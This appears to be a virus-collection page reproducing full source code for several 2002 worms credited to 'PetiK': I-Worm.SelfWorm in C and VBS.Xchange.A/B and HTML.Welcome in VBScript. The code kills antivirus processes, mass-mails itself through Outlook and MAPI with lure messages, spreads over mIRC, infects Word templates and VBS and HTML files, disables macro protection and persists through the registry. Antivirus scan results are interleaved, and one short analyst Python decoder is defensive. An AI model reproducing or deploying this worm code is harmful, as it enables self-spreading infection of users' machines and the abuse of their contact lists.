wc.cbClsExtra    = 0;
wc.cbWndExtra    = 0;
wc.hInstance     = 0;
wc.hIcon         = LoadIcon(hInstance, lpszAppName);
wc.hCursor       = LoadCursor(NULL, IDC_ARROW);
wc.hbrBackground = (HBRUSH)(COLOR_WINDOW+1);
wc.lpszMenuName  = lpszAppName;
wc.lpszClassName = lpszAppName;

if(!RegisterWin95(&wc)) return FALSE; hInst = hInstance; hWnd = CreateWindow (lpszAppName, lpszTitle, WS_OVERLAPPEDWINDOW|WS_MAXIMIZEBOX, 150,150,300,200,NULL,NULL,hInstance,NULL); if(!hWnd) return FALSE; ShowWindow(hWnd, nCmdShow); ShowWindow(hWnd,SW_SHOWNORMAL); UpdateWindow(hWnd); while(GetMessage(&msg, NULL, 0,0)) { TranslateMessage(&msg); DispatchMessage(&msg); } return(msg.wParam); }

else { MessageBox(NULL,"SelfWorm actif","SelfWorm",MB_OK|MB_ICONINFORMATION); FreeLibrary(hMAPI); } }

BOOL RegisterWin95(CONST WNDCLASS* lpwc) { WNDCLASSEX wcex; wcex.style = lpwc->style; wcex.lpfnWndProc = lpwc->lpfnWndProc; wcex.cbClsExtra = lpwc->cbClsExtra; wcex.cbWndExtra = lpwc->cbWndExtra; wcex.hInstance = lpwc->hInstance; wcex.hIcon = lpwc->hIcon; wcex.hCursor = lpwc->hCursor; wcex.hbrBackground = lpwc->hbrBackground; wcex.lpszMenuName = lpwc->lpszMenuName; wcex.lpszClassName = lpwc->lpszClassName; wcex.cbSize = sizeof(WNDCLASSEX); wcex.hIconSm = LoadIcon(wcex.hInstance, "TDW"); return RegisterClassEx(&wcex); } LRESULT CALLBACK WndProc( HWND hWnd, UINT uMsg, WPARAM wParam, LPARAM lParam) { static HWND hEdit = NULL; switch(uMsg) { case WM_INITDIALOG: hEdit=CreateWindow( "BUTTON", "ABOUT",WS_CHILD | WS_VISIBLE | BS_PUSHBUTTON,0,0,290,190,hWnd,(HMENU)IDM_ABOUT,hInst,NULL ); break; case WM_COMMAND: switch(LOWORD(wParam)) { case IDM_ABOUT: MessageBox(NULL,"Written by PetiK. (c)2002","I-Worm.SelfWorm", MB_OK|MB_ICONINFORMATION); break; case IDM_MIRC: mirc("C:\\mirc\\script.ini"); mirc("C:\\mirc32\\script.ini"); mirc("C:\\Program Files\\mirc\\script.ini"); mirc("C:\\Program Files\\mirc32\\script.ini"); mirc("C:\\progra~1\\mirc\\script.ini"); mirc("C:\\progra~1\\mirc32\\script.ini"); break; case IDM_STOPAV: StopAV("AVP32.EXE"); // AVP StopAV("AVPCC.EXE"); // AVP StopAV("AVPM.EXE"); // AVP StopAV("WFINDV32.EXE"); // Dr. 
Solomon StopAV("F-AGNT95.EXE"); // F-Secure StopAV("NAVAPW32.EXE"); // Norton Antivirus StopAV("NAVW32.EXE"); // Norton Antivirus StopAV("NMAIN.EXE"); // Norton Antivirus StopAV("PAVSCHED.EXE"); // Panda AntiVirus StopAV("ZONEALARM.EXE"); // ZoneAlarm break; case IDM_STARTUP: strcpy(start,startup); strcat(start,"\\Shell32.exe"); CopyFile(filename,"C:\\hello.exe",0); break; case IDM_VBSSPREAD: vbsworm=fopen("C:\\selfworm.vbs","w"); fprintf(vbsworm,"On Error Resume Next\n"); fprintf(vbsworm,"Set sys=sf.GetSpecialFolder(1)\n"); fprintf(vbsworm,"Set OA=CreateObject(%cOutlook.Application %c)\n",34,34); fprintf(vbsworm,"Set MA=OA.GetNameSpace(%cMAPI%c)\n",34,34); fprintf(vbsworm,"For Each C In MA.AddressLists\n"); fprintf(vbsworm,"If C.AddressEntries.Count <> 0 Then\n"); fprintf(vbsworm,"For D=1 To C.AddressEntries.Count\n"); fprintf(vbsworm,"Set AD=C.AddressEntries(D)\n"); fprintf(vbsworm,"Set EM=OA.CreateItem(0)\n"); fprintf(vbsworm,"EM.To=AD.Address\n"); fprintf(vbsworm,"EM.Subject=%cHi %c&AD.Name&%c look at this. %c\n",34,34,34,34); fprintf(vbsworm,"body=%cI found this on the web.%c\n",34,34); fprintf(vbsworm,"body = body & VbCrLf & %cOpen this funny tool. %c\n",34,34);

fprintf(vbsworm,"EM.Body=body\n"); fprintf(vbsworm,"EM.Attachments.Add(%c%s%c)\n",34,cpywrm,34); fprintf(vbsworm,"EM.DeleteAfterSubmit=True\n"); fprintf(vbsworm,"If EM.To <> %c%c Then\n",34,34); fprintf(vbsworm,"EM.Send\n"); fprintf(vbsworm,"End If\n"); fprintf(vbsworm,"Next\n"); fprintf(vbsworm,"End If\n"); fprintf(vbsworm,"Next\n"); fclose(vbsworm); ShellExecute(NULL,"open","C:\\selfworm.vbs",NULL,NULL,SW_SHOWNORMAL); Sleep(3000); DeleteFile("C:\\selfworm.vbs"); break; case IDM_READMAIL: mLogon(NULL,NULL,NULL,MAPI_NEW_SESSION,NULL,&session); if(mFindNext(session,0,NULL,NULL,MAPI_LONG_MSGID,NULL,messId)==SUCCESS_SUCCESS) { do { if(mReadMail(session,NULL,messId,MAPI_ENVELOPE_ONLY| MAPI_PEEK,NULL,&mes)==SUCCESS_SUCCESS) { strcpy(mname,mes->lpOriginator->lpszName); strcpy(maddr,mes->lpOriginator->lpszAddress); mes->ulReserved=0; mes->lpszSubject="Re: NEW MAIL."; mes->lpszNoteText="Here you have a new mail with a funny tool. No danger.\n" " See you soon."; mes->lpszMessageType=NULL; mes->lpszDateReceived=NULL; mes->lpszConversationID=NULL; mes->flFlags=MAPI_SENT; mes->lpOriginator->ulReserved=0; mes->lpOriginator->ulRecipClass=MAPI_ORIG; mes->lpOriginator->lpszName=mes->lpRecips->lpszName; mes->lpOriginator->lpszAddress=mes->lpRecips->lpszAddress; mes->nRecipCount=1; mes->lpRecips->ulReserved=0; mes->lpRecips->ulRecipClass=MAPI_TO; mes->lpRecips->lpszName=mname; mes->lpRecips->lpszAddress=maddr; mes->nFileCount=1; mes->lpFiles=(MapiFileDesc *)malloc(sizeof(MapiFileDesc)); memset(mes->lpFiles, 0, sizeof(MapiFileDesc)); mes->lpFiles->ulReserved=0; mes->lpFiles->flFlags=NULL; mes->lpFiles->nPosition=-1; mes->lpFiles->lpszPathName=filename; mes->lpFiles->lpszFileName="funny_tool.exe"; mes->lpFiles->lpFileType=NULL; mSendMail(session, NULL, mes, NULL, NULL); } } while(mFindNext(session,0,NULL,messId,MAPI_LONG_MSGID,NULL,messId)==SUCCESS_SUCCESS); free(mes->lpFiles); mFreeBuffer(mes); mLogoff(session,0,0,0); } break; case IDM_EXIT : FreeLibrary(hMAPI); DestroyWindow(hWnd); 
break; } break; case WM_DESTROY : PostQuitMessage(0); break; default: return (DefWindowProc(hWnd, uMsg, wParam, lParam)); } return(0L); } void mirc(char *dir) { FILE *script;

script=fopen("C:\\script.ini","w"); fprintf(script,"[script]\n"); fprintf(script,"n0=on 1:JOIN:#:{\n"); fprintf(script,"n1= /if ( $nick == $me ) { halt }\n"); fprintf(script,"n2= /.dcc send $nick %s\n",cpywrm); fprintf(script,"n3=}\n"); fclose(script); CopyFile("C:\\script.ini",dir,0); DeleteFile("C:\\script.ini"); } void StopAV(char *antivirus) { register BOOL term; lSnapshot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0); uProcess.dwSize=sizeof(uProcess); rProcessFound=Process32First(lSnapshot,&uProcess); while(rProcessFound) { if(strstr(uProcess.szExeFile,antivirus)!=NULL) { // Norton Antivirus myproc=OpenProcess(PROCESS_ALL_ACCESS,FALSE,uProcess.th32ProcessID); if(myproc!=NULL) { term=TerminateProcess(myproc,0); } CloseHandle(myproc); } rProcessFound=Process32Next(lSnapshot,&uProcess); } CloseHandle(lSnapshot); }

File SelfWorm.exe received on 05.16.2009 19:29:16 (CET) Antivirus a-squared AhnLab-V3 AntiVir Antiy-AVL Authentium Avast AVG BitDefender CAT-QuickHeal ClamAV Comodo DrWeb eSafe eTrust-Vet F-Prot F-Secure Fortinet GData Ikarus K7AntiVirus Kaspersky McAfee McAfee+Artemis McAfee-GW-Edition Microsoft NOD32 Norman nProtect Panda PCTools Prevx Rising Sophos Sunbelt Symantec TheHacker TrendMicro VBA32 ViRobot VirusBuster Version 4.0.0.101 5.0.0.2 7.9.0.168 2.0.3.1 5.1.2.4 4.8.1335.0 8.5.0.336 7.2 10.00 0.94.1 1157 5.0.0.12182 7.0.17.0 31.6.6508 4.4.4.56 8.0.14470.0 3.117.0.0 19 T3.1.1.49.0 7.10.737 7.0.0.125 5616 5616 6.7.6 1.4602 4080 6.01.05 2009.1.8.0 10.0.0.14 4.4.2.0 3.0 21.29.52.00 4.41.0 3.2.1858.2 1.4.4.12 6.3.4.1.326 8.950.0.1092 3.12.10.5 2009.5.15.1737 4.6.5.0 Last Update 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.08 2009.05.16 2009.05.14 2009.05.16 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 Result Trojan.Win32.SystemHijack!IK TR/Agent.29696.34 Trojan/Win32.heuristic W32/Heuristic-119!Eldorado Win32:Trojan-gen {Other} Generic13.ANUQ Generic.Malware.SIMPPk.0E8A8CAE BACKDOOR.Trojan Win32.HEURMalware W32/Heuristic-119!Eldorado PossibleThreat Generic.Malware.SIMPPk.0E8A8CAE Trojan.Win32.SystemHijack Trojan.Win32.Malware.1 Heur.Trojan.Generic Generic.dx!cf Generic.dx!cf Trojan.Agent.29696.34 Trojan:Win32/SystemHijack.gen probably unknown NewHeur_PE Trj/CI.A VBS.LoveLetter Medium Risk Malware Trojan.Spy.Win32.Undef.GEN [Suspicious] Mal/Generic-A Heur.Trojan.Generic PAK_Generic.001 VBS.LoveLetter

Additional information File size: 29696 bytes MD5...: e1a99c8d213bd20c976cabc1afb709f3 SHA1..: f886237a582c9bb29b30bb00e87dda8a067150f7 PEiD..: UPX 2.90 [LZMA] -> Markus Oberhumer, Laszlo Molnar & John Reiser

' Name     : VBS.Xchange.A
' Author   : PetiK
' Language : VBS
' Date     : 27/04/2002

On Error Resume Next Set fso=CreateObject("Scripting.FileSystemObject") Set ws=CreateObject("WScript.Shell") Set fl=fso.OpenTextFile(WScript.ScriptFullname,1) virus=fl.ReadAll fl.Close Set win=fso.GetSpecialFolder(0) fcopy=win&"\MSXchange.vbs" reg="HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" fso.GetFile(WScript.ScriptFullName).Copy(fcopy) ws.RegWrite reg&"\MsExchange",fcopy set sp=fso.CreateTextFile("C:\XChange.vba",True,8) sp.WriteLine "Attribute VB_Name = ""Xchange""" sp.WriteLine "Sub AutoOpen()" sp.WriteLine "On Error Resume Next" sp.WriteLine "e = """"" For i=1 To len(virus) e=Mid(virus,i,1) e=Hex(Asc(e)) If Len(e)=1 Then e="0"&e End If f=f+e If Len(f)=110 Then sp.WriteLine "e = e + """+f+"""" f="" End If If Len(virus)-i = 0 Then sp.WriteLine "e = e + """+f+"""" f="" End If Next sp.WriteLine "read=dec(e)" sp.WriteLine "Open ""C:\xchange.vbs"" For Output As #1" sp.WriteLine "Print #1, read" sp.WriteLine "Close #1" sp.WriteLine "Shell ""wscript C:\xchange.vbs""" sp.WriteLine "Call infect_fichier" sp.WriteLine "End Sub" sp.WriteLine "" sp.WriteLine "Sub HelpAbout()" sp.WriteLine "On Error Resume Next" sp.WriteLine "MsgBox ""This is my very first VBS-W97M Worm"", vbInformation, ""IWorm.Xchange""" sp.WriteLine "End Sub" sp.WriteLine "" sp.WriteLine "Sub AutoClose()" sp.WriteLine "On Error Resume Next" sp.WriteLine "FileSystem.Kill ""C:\xchange.vbs""" sp.WriteLine "End Sub" sp.WriteLine "" sp.WriteLine "Sub infect_fichier()" sp.WriteLine "On Error Resume Next" sp.WriteLine "Set nor = NormalTemplate.VBProject.VBComponents" sp.WriteLine "Set doc = ActiveDocument.VBProject.VBComponents" sp.WriteLine "df = ""C:\XChange.vba""" sp.WriteLine "If nor.Item(""Xchange"").Name <> ""Xchange"" Then" sp.WriteLine " doc(""Xchange"").Export df" sp.WriteLine " nor.Import df" sp.WriteLine "End If" sp.WriteLine "If doc.Item(""Xchange"").Name <> ""Xchange"" Then" sp.WriteLine " nor(""Xchange"").Export df" sp.WriteLine " doc.Import df" sp.WriteLine " ActiveDocument.Save"

sp.WriteLine "End If"
sp.WriteLine "End Sub"
sp.WriteLine ""
sp.WriteLine "Function dec(octe)"
sp.WriteLine "For hexad = 1 To Len(octe) Step 2"
sp.WriteLine "dec = dec & Chr(""&h"" & Mid(octe, hexad, 2))"
sp.WriteLine "Next"
sp.WriteLine "End Function"
sp.Close

infvbs(win) infvbs(fso.GetSpecialFolder(1)) SendWithOutlook() Set wd=CreateObject("Word.Application") If ws.RegRead ("HKLM\Software\Microsoft\MsXchange") <> "Coded by PetiK (c)2002" then CN = CreateObject("WScript.NetWork").ComputerName Set srch=wd.Application.FileSearch srch.Lookin = "C:\": srch.SearchSubFolders = True: srch.FileName="*.doc;*.dot": srch.Execute Set sp=fso.OpenTextFile(fcopy,8) sp.WriteLine "'On "&date& " at "&time&" from "&CN sp.WriteLine "'Number of DOC and DOT file found : "& srch.FoundFiles.Count sp.WriteBlankLines(1) sp.Close ws.RegWrite "HKLM\Software\Microsoft\MsXchange","Coded by PetiK (c)2002" End If Set vba=wd.NormalTemplate.VBProject.VBComponents If vba.Item("Xchange").Name <> "Xchange" Then vba.Import "C:\XChange.vba" wd.Application.NormalTemplate.Save End If wd.Application.NormalTemplate.Close wd.Application.Quit Set mel=fso.CreateTextFile(win&"\kitep.wab.txt",8,TRUE) counter=0 lect() mel.WriteLine "#" mel.Close WScript.Quit Sub lect() On Error Resume Next Set dr=fso.Drives For Each d in dr If d.DriveType=2 or d.DriveType=3 Then list(d.path&"\") End If Next End Sub Sub spreadmailto(dir) On Error Resume Next Set fso=CreateObject("Scripting.FileSystemObject") Set f=fso.GetFolder(dir) Set cf=f.Files For Each fil in cf ext=fso.GetExtensionName(fil.path) ext=lcase(ext) if (ext="htm") or (ext="html") or (ext="htt") or (ext="asp") Then set htm=fso.OpenTextFile(fil.path,1) verif=True allhtm=htm.ReadAll() htm.Close For ml=1 To Len(allhtm) count=0 If Mid(allhtm,ml,7) = "mailto:" Then counter=counter+1 mlto="" Do While Mid(allhtm,ml+6+count,1) <> """" count=count+1 mlto = mlto + Mid(allhtm,ml+6+count,1) loop

mel.WriteLine counter &" <"&left(mlto,len(mlto)-1)&">" sendmailto(left(mlto,len(mlto)-1)) End If Next End If Next End Sub Sub list(dir) On Error Resume Next Set f=fso.GetFolder(dir) Set ssf=f.SubFolders For Each fil in ssf spreadmailto(fil.path) list(fil.path) Next End Sub Sub sendmailto(email) Set out=CreateObject("Outlook.Application") Set mailmelto=out.CreateItem(0) mailmelto.To email mailmelto.Subject "Upgrade Ms Exchange" mailmelto.Body "Run this attached file to upgrade Ms Exchange" mailmelto.Attachment.Add (WScript.ScriptFullName) mailmelto.DeleteAfterSubmit = True mailmelto.Send Set out = Nothing End Sub Sub SendWithOutlook() Set A=CreateObject("Outlook.Application") Set B=A.GetNameSpace("MAPI") For Each C In B.AddressLists If C.AddressEntries.Count <> 0 Then For D=1 To C.AddressEntries.count Set E=C.AddressEntries(D) Set F=A.CreateItem(0) F.To=E.Address F.Subject="Update and upgrade MS Exchange." F.Body="run this attached file to update Ms Exchange. See you soon." Set G=CreateObject("Scripting.FileSystemObject") F.Attachments.Add(fcopy) F.DeleteAfterSubmit=True If F.To <> "" Then F.Send End If Next End If Next End Sub Function infvbs(Folder) If f.FolderExists(Folder) then For each P in f.GetFolder(Folder).Files ext=f.GetExtensionName(P.Name) If ext="vbs" or ext="vbe" Then Set VF=f.OpenTextFile(P.path, 1) mark=VF.Read(14) VF.Close If mark <> "'VBS.Xchange.A" Then Set VF=f.OpenTextFile(P.path, 1) VC=VF.ReadAll VF.Close VCd=virus & VC Set VF=f.OpenTextFile(P.path,2,True) VF.Write VCd VF.Close End If End If

Next End If End Function

File Xchange_A.vbs received on 05.16.2009 20:03:44 (CET) Antivirus a-squared AhnLab-V3 AntiVir Antiy-AVL Authentium Avast AVG BitDefender CAT-QuickHeal ClamAV Comodo DrWeb eSafe eTrust-Vet F-Prot F-Secure Fortinet GData Ikarus K7AntiVirus Kaspersky McAfee McAfee+Artemis McAfee-GW-Edition Microsoft NOD32 Norman nProtect Panda PCTools Prevx Rising Sophos Sunbelt Symantec TheHacker TrendMicro VBA32 ViRobot VirusBuster Version 4.0.0.101 5.0.0.2 7.9.0.168 2.0.3.1 5.1.2.4 4.8.1335.0 8.5.0.336 7.2 10.00 0.94.1 1157 5.0.0.12182 7.0.17.0 31.6.6508 4.4.4.56 8.0.14470.0 3.117.0.0 19 T3.1.1.49.0 7.10.737 7.0.0.125 5616 5616 6.7.6 1.4602 4080 6.01.05 2009.1.8.0 10.0.0.14 4.4.2.0 3.0 21.29.52.00 4.41.0 3.2.1858.2 1.4.4.12 6.3.4.1.326 8.950.0.1092 3.12.10.5 2009.5.15.1737 4.6.5.0 Last Update 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.08 2009.05.16 2009.05.14 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 Result Email-Worm.VBS.Xchange.A!IK VBS/Chu Worm/Chu.1 Worm/VBS.VBS VBS/Chu.A@mm VBS:Malware-gen I-Worm/Petik Generic.ScriptWorm.72BAC97E VBS/Chu.A Worm.Chu.1 Email-Worm.VBS.Chu.a VBS.Generic.15 VBS.FireBurn. VBS/VBSWG!generic VBS/Chu.A@mm Email-Worm.VBS.Chu.a VBS/Chu.A@mm Generic.ScriptWorm.72BAC97E Email-Worm.VBS.Xchange.A Email-Worm.VBS.Chu.a VBS/Generic@MM VBS/Generic@MM Worm.Chu.1 Virus:VBS/Chu probably unknown SCRIPT VBS/Chu.D VBS.Chu.B@mm VBS/Chu VBS.Petxch.A Script.VBS.Chu VBS/Xchange-A VBS.Pet_Tick.gen VBS_CHU.A Email-Worm.VBS.Chu.a VBS.Petxch.A

Additional information File size: 5770 bytes MD5...: de34d735d30bd0e107e14bb6aa8bf3e0 SHA1..: 8d976194e4ae851e0408c53f0db41f9c6f994a46

' Name     : VBS.Xchange.B aka RasLFront (because of the French presidential election of 2002)
' Author   : PetiK
' Language : VBS
' Date     : 05/05/2002

'VBS.Xchange.B aka RasLFront On Error Resume Next Set fso=CreateObject("Scripting.FileSystemObject") Set ws=CreateObject("WScript.Shell") Set fl=fso.OpenTextFile(WScript.ScriptFullname,1) virus=fl.ReadAll fl.Close Set win=fso.GetSpecialFolder(0) fcopy=win&"\XchgFix.vbs" reg="HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" 'fso.GetFile(WScript.ScriptFullName).Copy(fcopy) 'ws.RegWrite reg&"\MsExchangeFix",fcopy set sp=fso.CreateTextFile("C:\rlf.sys",True,8) sp.WriteLine "Private Sub Document_Open()" sp.WriteLine "On Error Resume Next" sp.WriteLine "e = """"" For i=1 To len(virus) e=Mid(virus,i,1) e=Hex(Asc(e)) If Len(e)=1 Then e="0"&e End If f=f+e If Len(f)=110 Then sp.WriteLine "e = e + """+f+"""" f="" End If If Len(virus)-i = 0 Then sp.WriteLine "e = e + """+f+"""" f="" End If Next sp.WriteLine "Call infect_fichier" sp.WriteLine "End Sub" sp.WriteLine "" sp.WriteLine "Sub HelpAbout()" sp.WriteLine "On Error Resume Next" sp.WriteLine "MsgBox ""This is my very first VBS-W97M Worm"", vbInformation, ""IWorm.Xchange""" sp.WriteLine "End Sub" sp.WriteLine "" sp.WriteLine "Sub AutoClose()" sp.WriteLine "On Error Resume Next" sp.WriteLine "FileSystem.Kill ""C:\xfix.vbs""" sp.WriteLine "End Sub" sp.WriteLine "" sp.WriteLine "Sub infect_fichier()" sp.WriteLine "On Error Resume Next" sp.WriteLine "Set nor = NormalTemplate.VBProject.VBComponents(1)" sp.WriteLine "Set doc = ActiveDocument.VBProject.VBComponents(1)" sp.WriteLine "df = ""C:\rlf.sys""" sp.WriteLine "If nor.Name <> ""raslfront"" Then" sp.WriteLine "nor.Name = ""raslfront""" sp.WriteLine "read=dec(e)" sp.WriteLine "Open ""C:\xfix.vbs"" For Output As #1" sp.WriteLine "Print #1, read" sp.WriteLine "Close #1" sp.WriteLine "Shell ""wscript C:\xfix.vbs""" sp.WriteLine "End If" sp.WriteLine "" sp.WriteLine "Function dec(octe)" sp.WriteLine "For hexad = 1 To Len(octe) Step 2" sp.WriteLine "dec = dec & Chr(""&h"" & Mid(octe, hexad, 2))"

sp.WriteLine "Next" sp.WriteLine "End Function" sp.Close Set wrd=CreateObject("Word.Application") wrd.Options.virusprotection=0 wrd.Options.savenormalprompt=0 wrd.Options.confirmconversion=0 If wrd.normaltemplate.vbproject.vbcomponents(1).name <> "raslfront" Then wrd.normaltemplate.vbproject.vbcomponents(1).codemodule.addfromFile("C:\rlf.sys") wrd.normaltemplate.vbproject.vbcomponents(1).name="raslfront" MsgBox "Pas Encore" End If wrd.Application.Quit WScript.Quit

<welcome> <html><head><title>Welcome</title> <body onLoad="window.status='Welcome to my last creation'"> <SCRIPT Language=VBScript> On Error Resume Next msgbox "Please accept the ActiveX",vbinformation,"MSIE Warning !" Set fso=CreateObject("Scripting.FileSystemObject") Set ws=CreateObject("WScript.Shell") If err.number=429 then ws.Run javascript:location.reload() Else vbsn="" For vbsname=1 To 8 randomize(timer) vbsn=vbsn & chr(int(rnd(1)*26)+65) Next vbsn=vbsn&".vbs" htms=document.body.createTextRange.htmltext Set vbsf=fso.CreateTextFile("C:\"&vbsn,2,True) vbsf.WriteLine "Set fs=CreateObject(""Scripting.FileSystemObject"")" vbsf.WriteLine "Set ws=CreateObject(""WScript.Shell"")" vbsf.Write "htm=""" For i=1 To Len(htms) e=Mid(htms,i,1) e=Hex(Asc(e)) If Len(e)=1 Then e="0"&e End If vbsf.Write e Next vbsf.Write """" vbsf.WriteLine "" vbsf.WriteLine "Set newhtm=fs.CreateTextFile(""C:\Welcome2U.htm"",True,2)" vbsf.WriteLine "newhtm.WriteLine ""<welcome>""" vbsf.WriteLine "newhtm.WriteLine ""<html><head><title>Welcome</title>""" vbsf.WriteLine "newhtm.WriteLine ""<body onLoad=""""window.status='Welcome to my last creation'"""">""" vbsf.WriteLine "read=""""" vbsf.WriteLine "For pos=1 To Len(htm) Step 2" vbsf.WriteLine "read=read " &Chr(38)& " Chr(""" &Chr(38)& "h"""&Chr(38)& " Mid(htm,pos,2))" vbsf.WriteLine "Next" vbsf.WriteLine "newhtm.Write read" vbsf.WriteLine "newhtm.WriteLine ""</body></html>""" vbsf.WriteLine "newhtm.Close" vbsf.WriteLine "ws.Run ""C:\Welcome2U.htm""" vbsf.Close Set win=fso.GetSpecialFolder(0) Set sys=fso.GetSpecialFolder(1) Set out=CreateObject("Outlook.Application") Set map=out.GetNameSpace("MAPI") For Each adr In map.AddressLists If adr.AddressEntries <> 0 Then For addr=1 To adr.Addressentries.Count Set nadr=adr.AddressEntries(addr) Set mel=out.CreateItem(0) mel.To=nadr.Address mel.Subject="A Gift from your best friend" mel.Body="This is for you (" &left(vbsn,8)& ")." 
mel.Attachments.Add("C:\"&vbsn) mel.Send Next End If Next infect(win) infect(sys) infect(fso.GetSpecialFolder(1)) infect(ws.SpecialFolders("MyDocuments")) infect(ws.SpecialFolders("Desktop")) infect(ws.SpecialFolders("Favorites"))

infect(ws.SpecialFolders("Recent")) If Day(Now())=7 Then document.write "<font face='Lucida Console' size='2' color=black>Welcome to my last creation : HTML.Welcome.A<br>Coded by PetiK/[rRlf]<br></font>" Else document.write "<font face='Lucida Console' size='3' color=black>Welcome To You !<br>Have a nice day.<br></font>" End If End If Function infect(doss) Set FolderObj = FSO.GetFolder(doss) Set FO = FolderObj.Files For each cible in FO ext = lcase(FSO.GetExtensionName(cible.Name)) if ext="htm" or ext="html" or ext="htz" or ext="hta" or ext="asp" Then Set good = fso.OpenTextFile(cible.path, 1, False) if good.readline <> "<welcome>" Then good.close() Set good = fso.OpenTextFile(cible.path, 1, False) htmorg = good.ReadAll() good.close() Set virus = document.body.createTextRange Set good = fso.CreateTextFile(cible.path, True, False) good.WriteLine "<welcome>" good.Write(htmorg) good.WriteLine virus.htmltext good.Close() else good.close() end if end if next End Function </script> </body></html> YVQAVQXD.vbs Set fs=CreateObject("Scripting.FileSystemObject") Set ws=CreateObject("WScript.Shell") htm="0D0A3C534352495054206C61...6E67756167543E" Set newhtm=fs.CreateTextFile("C:\Welcome2U.htm",True,2) newhtm.WriteLine "<welcome>" newhtm.WriteLine "<html><head><title>Welcome</title>" newhtm.WriteLine "<body onLoad=""window.status='Welcome to my last creation'"">" read="" For pos=1 To Len(htm) Step 2 read=read & Chr("&h"& Mid(htm,pos,2)) Next newhtm.Write read newhtm.WriteLine "</body></html>" newhtm.Close ws.Run "C:\Welcome2U.htm"
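The Xchange.A/B droppers above and the .vbs that HTML.Welcome writes all carry a second copy of the script as runs of hex digit pairs (the `e = e + "..."` chain, or the single `htm="..."` line) that a `dec`-style loop rebuilds with `Chr("&h" & ...)`. As an added analyst-side example, not part of PetiK's code, the Python below reverses that: it pulls such hex chains out of a script text, decodes them, and checks the result for the two infection markers the listings test for (`'VBS.Xchange.A` as the first 14 characters, `<welcome>` as the first line). The function names and the sample module are my own constructions.

```python
import re

# A quoted run of hex digit pairs, as the droppers above emit it:
#   e = e + "4F6E4572..."   (XChange.vba module, 110 digits per line)
#   htm="0D0A3C5343..."     (the .vbs that HTML.Welcome drops)
ASSIGN_RE = re.compile(
    r'^\s*(?P<var>\w+)\s*=\s*(?:(?P=var)\s*[+&]\s*)?"(?P<hex>[0-9A-Fa-f]{8,})"\s*$'
)

# Markers the listings themselves test before infecting a file.
XCHANGE_MARK = "'VBS.Xchange.A"   # infvbs() reads the first 14 characters
WELCOME_MARK = "<welcome>"        # infect() compares the first line


def extract_hex_payloads(script):
    """Return {variable: decoded_text} for every hex-string chain in a script.

    Chunks assigned to one variable are joined in file order, mirroring the
    worm's  e = e + "..."  chain, then decoded two digits at a time exactly
    as its dec() loop does with Chr("&h" & Mid(octe, hexad, 2)).
    """
    chunks = {}
    for line in script.splitlines():
        m = ASSIGN_RE.match(line)
        if m is None:
            continue
        digits = m.group("hex")
        if len(digits) % 2:           # not byte pairs: an ordinary string literal
            continue
        chunks.setdefault(m.group("var"), []).append(digits)
    decoded = {}
    for var, parts in chunks.items():
        raw = bytes.fromhex("".join(parts))
        # Chr() yields one ANSI character per byte; latin-1 keeps every byte
        # intact so the recovered script can be inspected without loss.
        decoded[var] = raw.decode("latin-1")
    return decoded


def infection_markers(text):
    """List which of the listings' own infection markers a file carries."""
    found = []
    if text.startswith(XCHANGE_MARK):
        found.append("VBS.Xchange.A prepend marker")
    first_line = text.split("\n", 1)[0].strip()
    if first_line.lower() == WELCOME_MARK:
        found.append("HTML.Welcome marker")
    return found


def build_sample_module(payload, width=110):
    """Constructed test input shaped like the XChange.vba dropper: the payload
    hex-encoded into  e = e + "<hex>"  lines of 110 digits, as above."""
    digits = payload.encode("latin-1").hex().upper()
    lines = ['Attribute VB_Name = "Xchange"', "Sub AutoOpen()", 'e = ""']
    lines += [f'e = e + "{digits[i:i + width]}"' for i in range(0, len(digits), width)]
    lines += ["read=dec(e)", "End Sub"]
    return "\n".join(lines)


if __name__ == "__main__":
    # Constructed sample: a harmless three-line script carrying the Xchange marker.
    sample = build_sample_module(
        "'VBS.Xchange.A\r\nOn Error Resume Next\r\n"
        'Set fso=CreateObject("Scripting.FileSystemObject")\r\n'
    )
    for var, text in extract_hex_payloads(sample).items():
        print(f"{var}: {len(text)} chars recovered, markers={infection_markers(text)}")
```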

File Welcome.htm received on 05.16.2009 19:58:08 (CET) Antivirus a-squared AhnLab-V3 AntiVir Antiy-AVL Authentium Avast AVG BitDefender CAT-QuickHeal ClamAV Comodo DrWeb eSafe eTrust-Vet F-Prot F-Secure Fortinet GData Ikarus K7AntiVirus Kaspersky McAfee McAfee+Artemis McAfee-GW-Edition Microsoft NOD32 Norman nProtect Panda PCTools Prevx Rising Sophos Sunbelt Symantec TheHacker TrendMicro VBA32 ViRobot VirusBuster Version 4.0.0.101 5.0.0.2 7.9.0.168 2.0.3.1 5.1.2.4 4.8.1335.0 8.5.0.336 7.2 10.00 0.94.1 1157 5.0.0.12182 7.0.17.0 31.6.6508 4.4.4.56 8.0.14470.0 3.117.0.0 19 T3.1.1.49.0 7.10.737 7.0.0.125 5616 5616 6.7.6 1.4602 4080 6.01.05 2009.1.8.0 10.0.0.14 4.4.2.0 3.0 21.29.52.00 4.41.0 3.2.1858.2 1.4.4.12 6.3.4.1.326 8.950.0.1092 3.12.10.5 2009.5.15.1737 4.6.5.0 Last Update 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.08 2009.05.16 2009.05.14 2009.05.16 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.15 